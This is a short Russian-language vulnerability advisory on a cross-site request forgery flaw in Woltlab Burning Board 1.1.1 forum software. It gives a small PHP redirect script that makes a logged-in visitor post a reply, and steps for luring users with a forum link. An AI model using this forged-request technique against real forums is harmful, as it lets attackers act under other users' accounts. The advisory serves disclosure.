Манипуляция параметрами в Burning Board

Burning Board - программное обеспечение Web форума разработанное в PHP+MySQL для Windows и Unix.
Нападающий может создавать злонамеренную ссылку, которая способна к порождению действий, которые будут выполнены в контексте законного пользователя Burning Board, посетившего эту ссылку. Законный пользователь форума должен также быть заверен через опознавательный мандат на основе куки. Злонамеренная ссылка может включать BBCode.
Другие Web форумы (типа phpBB), могут быть также уязвимы к этой проблеме.
Уязвимость найдена в Woltlab Burning Board 1.1.1

Пример:
1. Создаем сценарий exploit.php
exploit.php // with php U can dynamically redirect to the same treads & boardid (parsing $HTTP_REFERER)
<?php
header ("Location:
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/
eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/
?>
2. Регистрируемся в форуме.
3. Посылаем сообщение:
Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"